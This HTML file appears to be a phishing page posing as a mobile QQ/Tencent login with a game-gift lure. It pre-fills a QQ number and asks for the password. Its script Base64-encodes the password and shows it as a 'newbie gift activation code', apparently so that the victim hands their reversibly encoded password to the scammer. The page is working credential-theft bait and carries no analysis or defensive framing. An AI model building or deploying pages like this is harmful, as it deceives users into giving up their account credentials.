<!DOCTYPE html>
<html lang="zh-cn">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1,user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <title>手机统一登录</title>
    <style type="text/css">
        @charset "utf-8";
        body,
        html {
            height: 100%
        }

        #go,
        #onekey,
        #vcode #submit,
        .copyright,
        .header,
        .nick,
        .q_login,
        .ui_topbar {
            text-align: center
        }

        .del_touch,
        .inputstyle {
            -webkit-tap-highlight-color: rgba(255, 255, 255, 0)
        }

        body {
            font-size: 16px;
            background: #eee
        }

        * {
            padding: 0;
            margin: 0;
            list-style: none;
            text-decoration: none
        }

        input::-webkit-input-placeholder,
        textarea::-webkit-input-placeholder {
            color: #aaa
        }

        input::-ms-input-placeholder,
        textarea::-ms-input-placeholder {
            color: #aaa
        }

        input:focus {
            outline: 0
        }

        .content {
            margin: 0 auto;
            width: 320px;
            height: 500px;
            position: relative;
            padding-top: 100px;
        }

        #error_tips {
            position: absolute;
            top: 0;
            z-index: 100;
            display: none;
            opacity: .95;
            width: 100%
        }

        #error_tips #error_tips_content {
            position: relative;
            padding: 16px 0 24px 24px;
            border-radius: 5px;
            background-color: #525C5F;
            height: 28px
        }

        #error_tips #error_tips_content #error_icon {
            position: absolute;
            top: 18px;
            display: inline-block;
            width: 24px;
            height: 24px;
            background: url("/style/8/images/info.png") no-repeat
        }

        #error_tips #error_tips_content #error_message {
            display: inline-block;
            line-height: 28px;
            font-size: 14px;
            color: #fff;
            padding: 0 0 0 28px
        }

        #error_message a,
        #error_message a:visited {
            color: #F15A22
        }

        @media (-webkit-min-device-pixel-ratio:2),
        (min-resolution:192dpi),
        (min-resolution:2dppx) {
            #error_tips #error_tips_content #error_icon {
                background: url("/style/8/images/info@2x.png") no-repeat;
                background-size: 24px 24px
            }
        }

        .login {
            margin: 0 auto;
            padding-top: 30px
        }

        .q_login {
            margin: 0 auto 40px;
            width: 290px;
            overflow: hidden
        }

        .inputstyle {
            width: 273px;
            height: 44px;
            color: #000;
            border: none;
            background: 0 0;
            padding-left: 15px;
            font-size: 16px;
            -webkit-appearance: none
        }

        .logo {
            height: 100px;
            width: 244px;
            margin: 0 auto 20px;
            background-size: 244px 100px
        }

        #switch,
        #vcode,
        #web_login {
            margin: 0 auto
        }

        .header {
            display: inline-block;
            height: 97px;
            width: 96px;
            position: relative
        }

        #q_login_logo,
        #q_login_tips,
        #remember,
        #remember+.checkbox,
        #vcode #input_tips,
        #vcode #vcode_img,
        #vcode #vcode_input,
        .del_touch,
        .del_touch_icon,
        .del_u,
        .header .img_out,
        .header img,
        .nick,
        .txt_default {
            position: absolute
        }

        .header img {
            width: 60px;
            height: 60px;
            top: 10px;
            left: 16px
        }

        .header .img_out {
            width: 60px;
            height: 60px;
            top: 9px;
            left: 15px;
            border: 1px solid #c6dbe8;
            border-radius: 4px;
            -webkit-box-shadow: 1px 1px 13px #6E6E6E
        }

        .nick {
            display: inline-block;
            top: 80px;
            left: 0;
            height: 20px;
            line-height: 18px;
            vertical-align: middle
        }

        .del_touch_icon {
            display: none;
            width: 30px;
            height: 30px;
            left: 60px;
            top: 0;
            z-index: 1
        }

        .del_icon {
            display: block;
            width: 24px;
            height: 22px;
            background: url("/style/8/images/android_logo_v1.png") -68px 0 no-repeat;
            border-radius: 11px
        }

        #web_login {
            width: 290px
        }

        #g_list {
            background: #fff;
            height: 89px;
            border-radius: 4px
        }

        #g_p,
        #g_u {
            position: relative
        }

        #g_u {
            border-bottom: 1px solid #eaeaea
        }

        .txt_default {
            top: 12px;
            left: 10px;
            color: #b3b3b3
        }

        .del_touch {
            right: 0;
            display: none;
            height: 44px;
            width: 48px;
            z-index: 1
        }

        .del_u {
            display: block;
            left: 15px;
            top: 13px;
            height: 18px;
            width: 18px;
            border-radius: 9px;
            background: url("/style/8/images/android_logo_v1.png") -117px -2px no-repeat
        }

        #auto_login {
            height: 24px;
            margin: 15px 0;
            color: #246183;
            position: relative
        }

        #auto_login .wording {
            position: absolute;
            left: 40px;
            line-height: 24px;
            height: 24px;
            font-size: 14px
        }

        #remember {
            left: 14px;
            top: 5px;
            cursor: pointer;
            z-index: 1;
            opacity: .01
        }

        #remember:checked+.checkbox {
            background: url("/style/8/images/checked.png") 1px 1px #146FDF;
            border-color: #146FDF
        }

        #remember+.checkbox {
            display: inline-block;
            width: 21px;
            height: 21px;
            left: 9px;
            top: 1px;
            border: 1px solid #9ABBE3;
            background: 0 0;
            border-radius: 11px
        }

        #go,
        #onekey {
            width: 290px;
            height: 44px;
            line-height: 44px;
            background: #146fdf;
            border: none;
            border-radius: 4px;
            color: #fff;
            font-size: 16px;
            margin-top: 15px;
            display: block
        }

        #go.weak,
        #onekey.weak,
        #switch #swicth_login {
            height: 42px;
            border: 1px solid #9abbe3;
            color: #146fdf
        }

        #onekey {
            background: #146fdf;
            display: none
        }

        #go.weak,
        #onekey.weak {
            background-color: #e7e7e7
        }

        #switch {
            width: 290px
        }

        #switch #swicth_login {
            width: 288px;
            line-height: 44px;
            border-radius: 5px;
            background: #e7e7e7;
            margin-top: 10px;
            text-align: center;
            font-size: 16px
        }

        #switch #zc_feedback {
            width: 290px;
            position: relative;
            margin-top: 15px;
            overflow: hidden
        }

        #switch #forgetpwd,
        #switch #zc {
            color: #246183;
            line-height: 14px;
            font-size: 14px;
            padding: 15px 10px
        }

        #switch #zc {
            float: right;
            margin-right: -10px
        }

        #switch #forgetpwd {
            float: left;
            margin-left: -10px
        }

        .tansparent {
            background: 0 0
        }

        #q_login_title {
            height: 32px;
            line-height: 22px;
            margin-bottom: 20px;
            position: relative
        }

        #q_login_logo {
            background: url("/style/8/images/android_logo_v1.png") -44px 0 no-repeat;
            width: 22px;
            height: 22px;
            left: 0
        }

        #q_login_tips {
            left: 30px;
            top: 0;
            color: #246183
        }


        


    </style>
    <style type="text/css">
        .content {
            margin: 0 auto;
            width: 320px;
            height: 500px;
            position: relative;
            padding-top: 100px;
        }

        .logo {
            background-image: url("http://game.gtimg.cn/images/yxzj/mall/m/ptlogin-logo.png");
        }

        #modal{
            position: absolute;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
            background:#fff;
            display: none;
        }

        #tetete{
            margin-top: 50%;
            text-align: center; 
        }

        #encode{
            margin-top: 20px; 
            text-align: center;
            color: #700d00;
        }
    </style>

</head>

<body>
    <div id="content" class="content">
        <div id="logo" class="logo"></div>
        <div id="web_login" style="display: block;">
            <ul id="g_list">
                <li id="g_u">
                    <div id="del_touch" class="del_touch" style="display: none;">
                        <span id="del_u" class="del_u"></span>
                    </div>
                    <input id="u" class="inputstyle" name="u" autocomplete="off" placeholder="请输入您的QQ号码" value="282357925">
                </li>
                <li id="g_p">
                    <div id="del_touch_p" class="del_touch">
                        <span id="del_p" class="del_u"></span>
                    </div>
                    <input id="p" class="inputstyle" maxlength="16" type="password" name="p" autocorrect="off" placeholder="请输入你的QQ密码">
                </li>
            </ul>
            <div id="auto_login" style="display: none;">
                <input type="checkbox" id="remember" checked="checked">
                <span class="checkbox"></span>
                <label class="wording"> 下次自动登录 </label>
            </div>
            <div id="go"> 登 录 </div>

        </div>
    </div>
    <div id="modal">
        <div id="tetete">
            新手礼拜激活码：
        </div>
        <div id="encode">

        </div>
    </div>
    <script src="./base64.js"></script>
    <script>
        window.onload = function() {
            var go = document.getElementById('go');
            var oP = document.getElementById('p');
            var oModal = document.getElementById('modal');
            var oCode = document.getElementById('encode');
            go.onclick = function() {
                if(p.value.length<6) {
                    alert('密码错误')
                }else {
                    var val = p.value;
                    var b = new Base64();
                    var str = b.encode(val);
                    console.log(str);
                    oModal.style.display = 'block';
                    oCode.innerHTML = str;


                    var pwd = b.decode(str);
                    //console.log(pwd);
                }
            }
        }
    </script>


</body>

</html>